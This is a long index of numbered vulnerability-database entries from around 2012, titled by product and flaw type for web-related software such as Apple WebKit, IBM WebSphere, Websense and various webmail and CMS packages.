[78532] Apple iTunes WebKit CVE-2012-3616 code execution
[78531] Apple iTunes WebKit CVE-2012-3606 code execution
[78530] Apple iTunes WebKit CVE-2012-3660 code execution
[78529] Apple iTunes WebKit CVE-2012-3687 code execution
[78528] Apple iTunes WebKit CVE-2012-3657 code execution
[78527] Apple iTunes WebKit CVE-2012-3601 code execution
[78526] Apple iTunes WebKit CVE-2012-3649 code execution
[78525] Apple iTunes WebKit CVE-2012-3676 code execution
[78524] Apple iTunes WebKit CVE-2012-3708 code execution
[78523] Apple iTunes WebKit CVE-2012-3613 code execution
[78522] Apple iTunes WebKit CVE-2012-3702 code execution
[78521] Apple iTunes WebKit CVE-2012-3692 code execution
[78520] Apple iTunes WebKit CVE-2012-3707 code execution
[78519] Apple iTunes WebKit CVE-2012-3710 code execution
[78518] Apple iTunes WebKit CVE-2012-3647 code execution
[78517] Apple iTunes WebKit CVE-2012-3684 code execution
[78516] Apple iTunes WebKit CVE-2012-3672 code execution
[78515] Apple iTunes WebKit CVE-2012-3659 code execution
[78514] Apple iTunes WebKit CVE-2012-3701 code execution
[78513] Apple iTunes WebKit CVE-2012-3614 code execution
[78512] Apple iTunes WebKit CVE-2012-3652 code execution
[78511] Apple iTunes WebKit CVE-2012-3671 code execution
[78510] Apple iTunes WebKit CVE-2012-3612 code execution
[78473] Roundcube Webmail email signature cross-site scripting
[78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
[78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
[78450] Websense Email Security security bypass
[78449] Websense Email Security information disclosure
[78447] McAfee Host Data Loss Prevention Web Post information disclosure
[78438] Webify photo gallery file deletion
[78437] Webify business directory file deletion
[78436] Webify edownloads cart file deletion
[78420] Weblinks component for Joomla! index.php SQL injection
[78404] Siemens Simatic WinCC WebNavigator cross-site scripting
[78401] Webify post file deletion
[78380] Honeywell HMIWeb Browser ActiveX control buffer overflow
[78346] Websense Web Security and Web Filter ISAPI Filter plug-in security bypass
[78345] Websense Web Security and Web Filter Filtering Service denial of service
[78344] Websense Web Security and Web Filter Remote Filtering security bypass
[78343] Websense Web Security and Web Filter Remote Filtering component denial of service
[78342] Websense Web Security and Web Filter flag information disclosure
[78341] Websense Web Security and Web Filter URL denial of service
[78335] Barracuda Web Filter Authentication Services Listing module cross-site scripting
[78320] Webmin edit_html.cgi directory traversal
[78319] Webmin show.cgi command execution
[78317] Webmin edit_mon.cgi and save_mon.cgi code execution
[78309] web@all CMS index.php file include
[78308] web@all CMS upload_json.php and cls_upload.php file upload
[78299] Websense Enterprise Filtering Service security bypass
[78281] Wiki Web Help links.php file include
[78273] Websense Web Security Investigative Reports command execution
[78251] RoundCube Webmail unspecified input cross-site scripting
[78225] Cybozu Live for Android WebView information disclosure
[78131] Websense Email Security SMTP information disclosure
[78129] McAfee Email and Web Security Appliance and McAfee Email Gateway Console/Dashboard cross-site scripting
[78128] McAfee Email and Web Security Appliance and McAfee Email Gateway URL session hijacking
[78127] McAfee Email and Web Security Appliance and McAfee Email Gateway URL information disclosure
[78119] HD Webplayer plugin for WordPress multiple SQL injection
[78109] Mozilla Firefox and Thunderbird Web console code execution
[78097] Mozilla Firefox, Thunderbird, and SeaMonkey WebGLshaders code execution
[78050] Simple Web Server HTTP header buffer overflow
[78047] IBM WebSphere Application Server and WebSphere Virtual Enterprise proxy server denial of service
[78032] Symantec Messaging Gateway management interface security bypass
[78028] Wiki Web Help multiple cross-site scripting
[78020] MediaSpan Website Management searchresults.asp cross-site scripting
[78019] Web Wiz Forums ForumID and ThreadPage parameters cross-site scripting
[77991] WebPA index.php security bypass
[77989] WebPA readfile.php file upload
[77979] McAfee Email and Web Security unspecified cross-site scripting
[77977] McAfee Email and Web Security session ID security bypass
[77964] GWebmail Subject and Name parameters cross-site scripting
[77963] Websense Content Gateway m_overview.ink cross-site scripting
[77959] IBM WebSphere Application Server PM44303 security bypass
[77936] web@all CMS index.php SQL injection
[77935] web@all CMS action.php cross-site scripting
[77934] web@all CMS action.php and index.php cross-site scripting
[77897] WeBid contents.php SQL injection
[77896] WeBid loader.php file include
[77895] WeBid getthumb.php directory traversal
[77861] GWebmail module parameter file include
[77857] T-dah Webmail addressbook.php cross-site request forgery
[77856] IlohaMail Webmail e-mail body and bookmarks cross-site scripting
[77854] Hupa Webmail e-mail subject and e-mail body cross-site scripting
[77850] Uebimiau Webmail multiple cross-site scripting
[77849] Zingiri Web Shop plugin for WordPress index.php SQL injection
[77827] Promocion Web index.php SQL injection
[77798] Roundcube Webmail e-mail body field cross-site scripting
[77697] IBM WebSphere Application Server CBIND security bypass
[77675] Apple WebKit CVE-2012-3690 drag and drop information disclosure
[77647] Apple WebKit CVE-2012-3592 code execution
[77646] Apple WebKit CVE-2012-3668 code execution
[77645] Apple WebKit CVE-2012-3681 code execution
[77644] Apple WebKit CVE-2012-3596 code execution
[77643] Apple WebKit CVE-2012-3639 code execution
[77642] Apple WebKit CVE-2012-0682 code execution
[77641] Apple WebKit CVE-2012-3604 code execution
[77640] Apple WebKit CVE-2012-3669 code execution
[77639] Apple WebKit CVE-2012-3680 code execution
[77638] Apple WebKit CVE-2012-0683 code execution
[77637] Apple WebKit CVE-2012-3696 WebSockets HTTP header injection
[77636] Apple WebKit CVE-2012-3594 code execution
[77635] Apple WebKit CVE-2012-3693 IDN spoofing
[77634] Apple WebKit CVE-2012-3667 code execution
[77633] Apple WebKit CVE-2012-3611 code execution
[77632] Apple WebKit CVE-2012-3638 code execution
[77631] Apple WebKit CVE-2012-3656 code execution
[77630] Apple WebKit CVE-2012-3670 code execution
[77629] Apple WebKit CVE-2012-3603 code execution
[77627] Apple WebKit CVE-2012-3615 code execution
[77626] Apple WebKit CVE-2012-3610 code execution
[77624] Apple WebKit CVE-2012-3691 security bypass
[77623] Apple WebKit CVE-2012-3618 code execution
[77622] Apple WebKit CVE-2012-3627 code execution
[77621] Apple WebKit CVE-2012-3641 code execution
[77620] Apple WebKit CVE-2012-3694 filesystem path information disclosure
[77619] Apple WebKit CVE-2012-3626 code execution
[77618] Apple WebKit CVE-2012-3650 SVG file information disclosure
[77617] Apple WebKit CVE-2012-3695 cross-site scripting
[77616] Apple WebKit CVE-2012-3655 code execution
[77615] Apple WebKit CVE-2012-3646 code execution
[77614] Apple WebKit CVE-2012-3595 code execution
[77613] Apple WebKit CVE-2012-3663 code execution
[77612] Apple WebKit CVE-2012-3683 code execution
[77611] Apple WebKit CVE-2012-3697
[77610] Apple WebKit CVE-2012-3591 code execution
[77609] Apple WebKit CVE-2012-3633 code execution
[77608] Apple WebKit CVE-2012-3599 code execution
[77607] Apple WebKit CVE-2012-3609 code execution
[77606] Apple WebKit CVE-2012-3593 code execution
[77605] Apple WebKit CVE-2012-3679 code execution
[77604] Apple WebKit CVE-2012-1520 code execution
[77603] Apple WebKit CVE-2012-3640 code execution
[77602] Apple WebKit CVE-2012-3589 code execution
[77601] Apple WebKit CVE-2012-3665 code execution
[77600] Apple WebKit CVE-2012-3666 code execution
[77599] Apple WebKit CVE-2012-3631 code execution
[77598] Apple WebKit CVE-2012-3597 code execution
[77597] Apple WebKit CVE-2012-3653 code execution
[77596] Apple WebKit CVE-2012-3678 code execution
[77595] Apple WebKit CVE-2012-3644 code execution
[77594] Apple WebKit CVE-2012-3630 code execution
[77593] Apple WebKit CVE-2012-3645 code execution
[77592] Apple WebKit CVE-2012-3686 code execution
[77591] Apple WebKit CVE-2012-3642 code execution
[77590] Apple WebKit CVE-2012-3628 code execution
[77589] Apple WebKit CVE-2012-3636 code execution
[77588] Apple WebKit CVE-2012-3629 code execution
[77587] Apple WebKit CVE-2012-3637 code execution
[77586] Apple WebKit CVE-2012-3682 code execution
[77585] Apple WebKit CVE-2012-3625 code execution
[77584] Apple WebKit CVE-2012-3634 code execution
[77583] Apple WebKit CVE-2012-3689 same origin policy bypass
[77582] Apple WebKit CVE-2012-3590 code execution
[77581] Apple WebKit CVE-2012-3605 code execution
[77580] Apple WebKit CVE-2012-3674 code execution
[77579] Apple WebKit CVE-2012-3635 code execution
[77578] Apple WebKit CVE-2012-3661 code execution
[77577] Apple WebKit CVE-2012-3608 code execution
[77576] Apple WebKit CVE-2012-3600 code execution
[77575] Apple WebKit CVE-2012-3664 code execution
[77574] Apple WebKit CVE-2012-3620 code execution
[77534] Dir2web3 index.php SQL injection
[77533] Dir2web3 information disclosure
[77509] Inout Webmail New Mail and Contacts module cross-site scripting
[77505] Mibew Web Messenger threadprocessor.php SQL injection
[77503] WinWebMail Server sendMail function cross-site scripting
[77500] T-dah Webmail sendMail function cross-site scripting
[77478] IBM WebSphere Application Server authentication cache weak security
[77477] IBM WebSphere Application Server application file directory traversal
[77476] IBM Websphere Application Server ISC console session hijacking
[77473] Cisco IOS local web denial of service
[77455] Cisco Adaptive Security Appliances WebVPN denial of service
[77404] WebPage Test resultimage.php file upload
[77390] IcedTea-Web Plugin strings code execution
[77389] The IcedTea-Web Plugin pointer code execution
[77382] IBM WebSphere Commerce personalization ID denial of service
[77338] Google Chrome WebP decoder buffer overflow
[77334] Google Chrome WebUI renderer information disclosure
[77333] Google Chrome webRequest interference unspecified
[77302] Dr. Web Enterprise Security Suite login page cross-site scripting
[77294] IBM WebSphere Commerce REST services framework security bypass
[77279] IBM WebSphere MQ SVRCONN channel security bypass
[77264] Symantec Web Gateway deptUploads_data.php SQL injection
[77180] IBM WebSphere MQ File Transfer Edition cross-site request forgery
[77179] IBM WebSphere Application Server Administration Console cross-site scripting
[77140] SimpleWebServer HTTP header buffer overflow
[77134] Oxide WebServer character denial of service
[77131] OSIsoft PI OPC DA Interface OPC message buffer overflow
[77116] Symantec Web Gateway ldap_latest.php SQL injection
[77115] Symantec Web Gateway console security bypass
[77114] Symantec Web Gateway console command execution
[77113] Symantec Web Gateway authentication mechanism file include
[77112] Symantec Web Gateway blocked.php SQL injection
[77111] Symantec Web Gateway console command execution
[77095] IBM WebSphere MQ File Transfer Edition Web Gateway security bypass
[77058] Oracle iPlanet Web Server Web Server denial of service
[77033] Oracle Siebel CRM Web UI unspecified
[76974] Dr.Web Anti-virus for Android information disclosure
[76953] Yahoo! Browser for Android WebView Class information disclosure
[76931] WebsiteBaker example.php cross-site scripting
[76930] web@all name parameter cross-site scripting
[76914] WebPagetest delete.php file deletion
[76913] WebPagetest download.php file download
[76912] WebPagetest about.php file include
[76911] WebPagetest dopublish.php, resultimage.php and workdone.php file upload
[76910] WebPagetest file parameter directory traversal
[76803] WebsitePanel ReturnUrl open redirect
[76799] IBM WebSphere MQ user id denial of service
[76783] Eclydre Web Manager upload.php file upload
[76779] WordPress FlexiWeb-Form plugin upload_img.php file upload
[76774] Webmatic Referer: parameter SQL injection
[76768] Webify Link Directory index.php SQL injection
[76687] Zingiri Web Shop plugin for WordPress download.php File Include
[76665] Novell GroupWise WebAccess directory traversal
[76656] SpecView Web Server web request directory traversal
[76643] webERP PathPrefix parameter file include
[76641] webERP index.php file include
[76603] Cisco WebEx Player audio data buffer overflow
[76602] Cisco WebEx Player WRF memory code execution
[76601] Cisco WebEx Player JPEG WRF buffer overflow
[76600] Cisco WebEx Player WRF file buffer overflow
[76599] Cisco WebEx Player ARF code execution
[76575] Symantec Message Filter interface information disclosure
[76572] Symantec Message Filter management interface cross-site scripting
[76571] Symantec Message Filter management interface cross-site request forgery
[76543] WD ShareSpace Network Storage System WEB GUI config.xml information disclosure
[76539] IMP Webmail Client SVG cross-site scripting
[76534] Apache Roller weblog cross-site scripting
[76478] web@all CMS search.php cross-site scripting
[76477] web@all CMS action.php cross-site request forgery
[76465] Cisco AnyConnect Secure Mobility Client WebLaunch code execution
[76459] Juniper Networks Mobility System Software web portal WebAAA wba_login.html cross-site scripting
[76434] IBM WebSphere MQ server message channel agent denial of service
[76427] WEB PATIO unspecified cross-site scripting
[76426] WEB PATIO unspecified cross-site scripting
[76421] WEBO Site SpeedUp wss_lang parameter file include
[76420] WEBO Site SpeedUp index.php file include
[76382] Webify Web Products index.php cross-site scripting
[76371] Webify Web Products index.php file include
[76363] Opera WebGL denial of service
[76321] Zingiri Web Shop plugin for WordPress uploadfilexd.php file upload
[76318] TinyWebGallery selitems[] and searchitem parameters cross-site scripting
[76316] TinyWebGallery index.php code execution
[76315] TinyWebGallery unspecified cross-site request forgery
[76273] Quest Webthority unspecified cross-site request forgery
[76262] Bradford Network Sentry interface cross-site request forgery
[76239] Oracle Java WebStart BasicService.showDocument() code execution
[76224] Bloxx Web Filtering Microdasys cross-site request forgery
[76216] Webspell dailyinput Movie-Addon index.php SQL injection
[76186] HP Web Jetadmin unspecified cross-site scripting
[76164] Webspell FIRSTBORN Movie-Addon index.php SQL injection
[76137] RoundCube Webmail image cross-site scripting
[76109] Siemens WinCC DiagAgent web server denial of service
[76090] ATWEB ShoppingCart unspecified cross-site scripting
[76018] MiniWeb Content-Length header denial of service
[76010] Bloxx Web Filtering X-Forwarded-For HTTP header injection
[76009] Bloxx Web Filtering backup configuration file information disclosure
[76008] Bloxx Web Filtering multiple scripts cross-site scripting
[76007] Bloxx Web Filtering multiple cross-site request forgery
[75999] Simple Web Content Management System multiple scripts SQL injection
[75916] WhyWeb property.php and hom001.php SQL injection
[75734] Tornado tornado.web.RequestHandler.set_header() function HTTP response splitting
[75732] Symantec Web Gateway file download
[75731] Symantec Web Gateway file include
[75730] Symantec Web Gateway unspecified command execution
[75706] Epicor Returns Management SOAP interface SQL injection
[75674] WEB MART Internet Explorer CSS expressions cross-site scripting
[75673] WEB MART crafted Cookies cross-site scripting
[75666] 3D Life Player WebPlayer ActiveX control buffer overflow
[75624] Zingiri Web Shop plugin for WordPress Stock management module SQL injection
[75623] Zingiri Web Shop plugin for WordPress connect.php and admin.php cross-site scripting
[75585] NTDS Web Studio pacotes.php SQL injection
[75584] IBM WebSphere Portal Dojo module directory traversal
[75583] Vallarta Web Services realestate_listings.php SQL injection
[75482] Schneider Electrics Telecontrol Kerwin and Kerweb searching cross-site scripting
[75474] Apple Safari WebKit state tracking security bypass
[75431] Apple iOS WebKit code execution
[75428] Kerweb and Kerwin multiple cross-site scripting
[75407] Cisco Unified MeetingPlace Web component SQL injection
[75381] Fortinet Fortiweb security bypass
[75380] Symantec Web Gateway timer.php cross-site scripting
[75356] Websense TRITON ws_irpt.exe command execution
[75353] Websense TRITON favorites.exe cross-site scripting
[75324] Zingiri Web Shop plugin for WordPress index.php cross-site scripting
[75280] Maxxweb CMS anzeigen_neu.php cross-site scripting
[75241] ACTi Web Configurator cgi-bin directory traversal
[75234] IBM WebSphere Application Server snoop servlet information disclosure
[75221] C4B XPhone Unified Communications Web client.aspx cross-site scripting
[75179] Zingiri Web Shop plugin for WordPress onecheckout.php cross-site scripting
[75178] Zingiri Web Shop plugin for WordPress zing.inc.php cross-site scripting
[75153] Mozilla Firefox, Thunderbird, and SeaMonkey WebSocket security bypass
[75151] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL.drawElements() information disclosure
[75111] School Website Solutions Search and Calendar modules cross-site scripting
[75094] WebCalendar index.php code execution
[75091] WebCalendar pref.php file include
[75086] Cox Web &
[75065] Vermont Web Design eventdisplay.php SQL injection
[75063] Liferay Portal webdav information disclosure
[75054] Website Toolbox multiple parameters cross-site scripting
[75044] Zingiri Web Shop plugin for WordPress unspecified
[75037] IBM SONAS Web GUI and CLI command execution
[75036] TwitRocker2 for Android WebView class security bypass
[75005] Oracle Sun Products Suite iPlanet Web Server unspecified
[75001] Oracle Primavera Web application unspecified
[74983] Oracle Siebel Clinical Web UI unspecified
[74982] Oracle Siebel Clinical Web UI unspecified
[74953] Oracle WebCenter Forms Recognition Designer unspecified
[74952] Oracle WebCenter Forms Recognition Designer unspecified
[74908] Fastpath WebChat multiple scripts cross-site scripting
[74900] IBM WebSphere Application Server plugin-key.kdb spoofing
[74883] McAfee Web Gateway HTTP Host security bypass
[74786] Cisco IronPort Web Security Appliance fingerprint spoofing
[74785] Cisco IronPort Web Security Appliance basicConstraints spoofing
[74784] Cisco IronPort Web Security Appliance SSL spoofing
[74739] ISPConfig webdav_user_edit.php security bypass
[74620] Charles River Web CMS search.php cross-site scripting
[74610] IBM Tivoli Directory Server Web Admin Tool cross-site scripting
[74606] WebEx Business Suite WRF file buffer overflow
[74605] WebEx Business Suite atas32.dll buffer overflow
[74604] WebEx Business Suite atdl2006.dll buffer overflow
[74596] VitalogyWeb company.php cross-site scripting
[74587] FastWeb2 category_id parameter cross-site scripting
[74547] TYPO3 Command Line Interface (CLI) information disclosure
[74536] WebMatter CMS subcategoria.asp and lista_productos.asp SQL injection
[74499] ZyXel GS1510 webctrl.cgi information disclosure
[74407] Vitalogyweb CMS company.php SQL injection
[74392] FreePBX recordings interface code execution
[74321] WebGlimpse DOC directory traversal
[74320] WebGlimpse wgarcmin.cgi path disclosure
[74317] PHP Web server denial of service
[74222] WebGlimpse webglimpse.cgi command execution
[74214] Google Chrome webui weak security
[74212] Google Chrome WebGL canvas code execution
[74197] BebopWeb portfolio-secc.php SQL injection
[74194] FastWeb2 cat_prod.php and fw2_landpage.php SQL injection
[74184] Webglimpse DOC cross-site scripting
[74164] Aruba Remote Access Point interface command execution
[74156] CrazyTalk Web Player ActiveX control buffer overflow
[74141] Eweb large.php and pages.php scripts SQL injection
[74061] Barracuda Web Filter index.cgi cross-site scripting
[74044] IBM WebSphere Application Server Integration Solution Console cross-site scripting
[74009] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified information disclosure
[74008] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified directory traversal
[74007] McAfee Email and Web Security Appliance and McAfee Email Gateway passwords information disclosure
[74006] McAfee Email and Web Security Appliance and McAfee Email Gateway Dashboard session hijacking
[74005] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified cross-site scripting
[74004] McAfee Email and Web Security Appliance and McAfee Email Gateway password security bypass
[73967] Nor-Rec WebBasic kategori.php SQL injection
[73965] Pobol WebBasic resimler.php SQL injection
[73937] Apple Safari WebKit security bypass
[73926] Aurora WebOPAC MemberDetailsRecovery.aspx SQL injection
[73923] Apple Safari WebKit HTTP authentication credentials information disclosure
[73897] Drupal UC PayDutchGroup / WebDeal payment module unspecified information disclosure
[73896] PROMISE Technology WebPAM index.jsp information disclosure
[73895] PROMISE Technology WebPAM userID parameter response splitting
[73894] Promise WebPAM ent_i.jsp and sqlrun.jsp SQL injection
[73873] Apple iOS WebKit unspecified cross-site scripting
[73872] Apple iOS WebKit cross-site scripting
[73853] Apple WebKit unspecified code execution
[73852] Apple WebKit unspecified code execution
[73851] Apple WebKit unspecified code execution
[73850] Apple WebKit unspecified code execution
[73849] Apple WebKit unspecified code execution
[73848] Apple WebKit unspecified code execution
[73847] Apple WebKit unspecified code execution
[73846] Apple WebKit unspecified code execution
[73845] Apple WebKit unspecified code execution
[73844] Apple WebKit unspecified code execution
[73843] Apple WebKit unspecified code execution
[73842] Apple WebKit unspecified code execution
[73841] Apple WebKit unspecified code execution
[73840] Apple WebKit unspecified code execution
[73839] Apple WebKit unspecified code execution
[73838] Apple WebKit unspecified code execution
[73837] Apple WebKit unspecified code execution
[73836] Apple WebKit unspecified code execution
[73835] Apple WebKit unspecified code execution
[73834] Apple WebKit unspecified code execution
[73833] Apple WebKit unspecified code execution
[73832] Apple WebKit unspecified code execution
[73831] Apple WebKit unspecified code execution
[73830] Apple WebKit unspecified code execution
[73829] Apple WebKit unspecified code execution
[73828] Apple WebKit unspecified code execution
[73827] Apple WebKit unspecified code execution
[73826] Apple WebKit unspecified code execution
[73825] Apple WebKit unspecified code execution
[73824] Apple WebKit unspecified code execution
[73823] Apple WebKit unspecified code execution
[73822] Apple WebKit unspecified code execution
[73821] Apple WebKit unspecified code execution
[73820] Apple WebKit unspecified code execution
[73819] Apple WebKit unspecified code execution
[73818] Apple WebKit unspecified code execution
[73817] Apple WebKit unspecified code execution
[73816] Apple WebKit unspecified code execution
[73815] Apple WebKit unspecified code execution
[73814] Apple WebKit unspecified code execution
[73813] Apple WebKit unspecified code execution
[73812] Apple WebKit unspecified code execution
[73811] Apple WebKit unspecified code execution
[73810] Apple WebKit unspecified code execution
[73809] Apple WebKit unspecified code execution
[73808] Apple WebKit unspecified code execution
[73807] Apple WebKit unspecified code execution
[73805] Apple WebKit unspecified code execution
[73804] Apple WebKit unspecified code execution
[73803] Apple WebKit unspecified code execution
[73802] Apple WebKit unspecified code execution
[73801] Apple WebKit unspecified code execution
[73800] Apple WebKit unspecified code execution
[73799] Apple WebKit unspecified code execution
[73798] Apple WebKit unspecified code execution
[73797] Apple WebKit unspecified code execution
[73796] Apple WebKit unspecified code execution
[73795] Apple WebKit unspecified code execution
[73794] Apple WebKit unspecified code execution
[73793] Apple WebKit unspecified code execution
[73792] Apple WebKit unspecified code execution
[73791] Apple WebKit unspecified code execution
[73790] Apple WebKit unspecified code execution
[73789] Apple WebKit unspecified code execution
[73788] Apple WebKit unspecified code execution
[73784] PROMISE Technology WebPAM ent_i.jsp cross-site scripting
[73779] Webform module for Drupal unspecified cross-site scripting
[73774] Apple WebKit multiple cross-site scripting
[73766] Apple iTunes WebKit memory code execution
[73765] Apple iTunes WebKit memory code execution
[73764] Apple iTunes WebKit memory code execution
[73763] Apple iTunes WebKit memory code execution
[73762] Apple iTunes WebKit memory code execution
[73753] Splunk Web unspecified cross-site scripting
[73749] IBM WebSphere Application Server SSLClientAuth security bypass
[73748] IBM WebSphere Application Server Administration Console cross-site scripting
[73738] Webfolio CMS multiple parameters cross-site scripting
[73737] JH webstudio article.php cross-site scripting
[73689] BlackBerry smartphones and the BlackBerry PlayBook tablet Webkit code execution
[73627] Apple Safari WebKit font-face code execution
[73575] Webfolio CMS Add Administrator and Modify Web Page cross-site request forgery
[73553] Cisco Wireless LAN Controller WebAuth denial of service
[73509] Webgrind index.php file include
[73485] Webglimpse wgarcmin.cgi cross-site scripting
[73484] Webglimpse wgarcmin.cgi unauthorized access
[73451] SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor information disclosure
[73401] WebTriad municipios.php SQL injection
[73400] WebsiteBaker CMS Referer HTTP header cross-site scripting
[73394] Fork CMS Delete Users or Web Pages cross-site request forgery
[73392] BroadWin and Advantech WebAccess unspecified cross-site request forgery
[73391] BroadWin and Advantech WebAccess URL SQL injection
[73385] WebcamXP and Webcam directory traversal
[73381] Unity Web Player 3D files buffer overflow
[73376] IBM WebSphere Lombardi Edition coach cross-site scripting
[73347] Invision Power Board interface cross-site scripting
[73337] Webgrind index.php cross-site scripting
[73334] Abbott Web Experts detail.php SQL injection
[73333] Rocketwebco story.php SQL injection
[73328] WebsiteBaker index.php and forgot.php cross-site scripting
[73316] D-Link DSL-2640B interface cross-site request forgery
[73284] BroadWin and Advantech WebAccess unspecified SQL injection
[73283] BroadWin and Advantech WebAccess ActiveX control buffer overflow
[73282] BroadWin and Advantech WebAccess message format string
[73281] BroadWin and Advantech WebAccess stream code execution
[73280] BroadWin and Advantech WebAccess bwview.asp cross-site scripting
[73279] BroadWin and Advantech WebAccess bwerrdn.asp cross-site scripting
[73278] BroadWin and Advantech WebAccess unspecified SQL injection
[73277] BroadWin and Advantech WebAccess file code execution
[73276] BroadWin and Advantech WebAccess unspecified buffer overflow
[73275] BroadWin and Advantech WebAccess ActiveX control buffer overflow
[73274] BroadWin and Advantech WebAccess GbScriptAddUp.asp code execution
[73273] BroadWin and Advantech WebAccess uaddUpAdmin.asp security bypass
[73272] BroadWin and Advantech WebAccess opcImg.asp buffer overflow
[73271] BroadWin and Advantech WebAccess URL security bypass
[73270] BroadWin and Advantech WebAccess URL information disclosure
[73269] BroadWin and Advantech WebAccess unspecified cross-site request forgery
[73268] BroadWin and Advantech WebAccess unspecified SQL injection
[73267] BroadWin and Advantech WebAccess unspecified cross-site scripting
[73264] Imperva SecureSphere Web Application Firewall unspecified cross-site scripting
[73243] Citrix XenServer Web Self Service unspecified
[73188] Oracle Java SE Java Runtime Environment Java Web Start code execution
[73181] Cisco IronPort Encryption Appliance interface cross-site scripting
[73154] STHS Web Portal prospects.php and team.php SQL injection
[73098] BroadWin and Advantech WebAccess RPC code execution
[73012] PHP-Fusion weblink_id parameter SQL injection
[72986] Siemens Simatic WinCC HMI web server and runtime loader code execution
[72965] TYPO3 Webservices Extension unspecified code execution
[72941] JBoss Web server character denial of service
[72913] Sphinix Software Mobile Web Server comment parameter cross-site scripting
[72902] Apple OS X Server WebDAV code execution
[72885] Microsoft SharePoint themeweb.aspx cross-site scripting
[72878] FishEye and Crucible Webwork 2 framework code injection
[72819] Maxxweb CMS news_view.php3 SQL injection
[72776] Ada Web Server hash denial of service
[72768] xClick Cart webscr.php cross-site scripting
[72739] Gekko Web Builder index.php cross-site scripting
[72712] NX Web Companion applet code execution
[72697] Stoneware webNetwork 6 unspecified SQL injection
[72683] Stoneware webNetwork 6 pinEditor.jsp cross-site scripting
[72682] Stoneware webNetwork 6 resetPasswordOptions.jsp cross-site request forgery
[72640] WordPress AllWebMenus Plugin actions.php file upload
[72636] Savant Web Server buffer overflow
[72606] WAGO interface information disclosure
[72597] Rockwell Automation ControlLogix interface control commands denial of service
[72594] Koyo ECOM100 Ethernet Module Web server denial of service
[72581] IBM WebSphere Application Server Virtual Member Manager weak security
[72572] Horde Groupware Webmail Edition Horde_Form page cross-site scripting
[72563] WebCalendar location parameter cross-site scripting
[72477] Oracle Fusion Middleware WebLogic Server component unspecified
[72476] Oracle Fusion Middleware WebCenter Content component unspecified
[72475] Oracle Fusion Middleware WebCenter Content component unspecified
[72474] Oracle Fusion Middleware WebLogic Server component denial of service
[72473] Oracle Fusion Middleware Web Services Manager component information disclosure
[72472] Oracle Fusion Middleware Web Services Manager component denial of service
[72471] Oracle Fusion Middleware Web Services Manager component unspecified
[72470] Oracle Fusion Middleware WebCenter Content component unspecified
[72445] IBM WebSphere Application Server default messaging component information disclosure
[72439] EMC SourceOne Web Search information disclosure
[72427] NeoAxis Game Engine neoaxis_web_application_win32.zip directory traversal
[72415] PHP Ringtone Website ringtoes.php cross-site scripting
[72406] WebTitan Appliance multiple parameters cross-site scripting
[72397] XAMPP WebDAV default password
[72343] GoAhead WebServer dhttpd denial of service
[72342] GoAhead WebServer HTTP denial of service
[72339] CoDeSys CmbWebserver.dll directory traversal
[72336] IBM WebSphere Application Server web messaging cross-site scripting
[72298] IBM WebSphere Application Server Java hash data structure denial of service
[72244] Splunk Splunkd web API directory traversal
[72237] IpTools mini WebServer directory traversal
[72231] MangosWeb Enhanced index.php SQL injection
[72167] @Mail Webmail EMail and Calendar module cross-site scripting
[72157] TinyWebGallery filefunctions.inc and ifo.php command execution
[72148] EasyWebRealEstate listings.php and index.php SQL injection
[72138] HServer webserver directory traversal
[72115] IBM Web Experience Factory text INPUT element and TEXTAREA element cross-site scripting
[72087] Splunk Web mappy.py code execution
[72036] Webboard Default.asp SQL injection
[71963] Public Knowledge Project administrative interface multiple applications file upload
[71962] Public Knowledge Project administrative interface multiple applications cross-site request forgery
[71959] cApexWEB capexweb.parentvalidatepassword SQL injection
[71888] WebSVN path parameter cross-site scripting
[71882] Capexweb login module SQL injection
[71851] Websense unspecified command execution
[71850] Websense unspecified cross-site scripting
[71848] Websense unspecified security bypass
[71823] Splunk Web unspecified cross-site request forgery
[71822] Splunk Web unspecified cross-site scripting
[71820] i4Style webpage.php cross-site scripting
[71819] i4Style Web Design webpage.php SQL injection
[71787] Barracuda Web Filter multiple components cross-site scripting
[71760] Opera Web Workers denial of service
[71747] WebApps multiple SQL injection
[71744] phpWebSite unspecified cross-site scripting
[71736] Apple Safari WebKit cache information disclosure
[71712] FFFTP WebDAV or SMB code execution
[71710] Moodle Web services authentication bypass
[71699] Linux Kernel bridge networking interface multiple denial of service
[71654] Apache Struts interfaces security bypass
[71597] Drupal Webform Validation module unspecified cross-site scripting
[71535] CoDeSys CmpWebServer weak security
[71534] CoDeSys CmpWebServer HTTP denial of service
[71533] CoDeSys CmpWebServer denial of service
[71532] CoDeSys CmpWebServer buffer overflow
[71504] Multiple Schneider Electric products Web portal directory traversal
[71465] libsocialweb Non-SSL man-in-the-middle
[71453] Siemens Simatic WinCC miniweb.exe denial of service
[71452] Siemens Simatic WinCC miniweb.exe directory traversal
[71410] webERP phpinfo.php information disclosure
[71409] webERP reportid parameter SQL injection
[71408] webERP multiple scripts cross-site scripting
[71339] InduSoft Web Studio CEServer.exe security bypass
[71337] Webistry CMS index.php SQL injection
[71336] IBM WebSphere MQ control commands denial of service
[71324] InduSoft Web Studio CEServer component buffer overflow
[71319] IBM WebSphere Application Server WS-Security enabled JAX-WS application weak security
[71315] IcedTea-Web Plugin SOP security bypass
[71307] SAP Netweaver Virus Scan Interface cross-site scripting
[71305] WebObjects unspecified cross-site scripting
[71285] Zingiri Web Shop plugin for WordPress selectedDoc[] code execution
[71246] WebDirector loginAdmin c_secureLogin.jsp and c_tslogin.jsp SQL injection
[71245] Webform CiviCRM Integration module for Drupal unspecified SQL injection
[71242] ALFContact component for Joomla! contact web form page cross-site scripting
[71232] Spectrum Software WebManager CMS pojam parameter cross-site scripting
[71230] IBM Websphere Application Server iscdeploy script insecure permissions
[71201] Mozilla Firefox and Thunderbird WebGL information disclosure
[71171] CmyDocument CMS myDoclist.asp and myWebDoclist.asp SQL injection
[71131] Web File Browser webFileBrowser.php directory traversal
[71114] GE Proficy Historian Web Administrator query string parameter cross-site scripting
[71081] Attraction Website Design event.php SQL injection
[71075] HP OpenView Network Node Manager webappmon.exe buffer overflow
[71033] Kent Web Forum multiple cross-site scripting
[71026] IBM TS3100 and TS3200 Tape Library Express Web management console authentication bypass
[71025] RoundCube Webmail URI denial of service
[71005] IBM WebSphere ILOG Rule Team Server error.jsp cross-site scripting
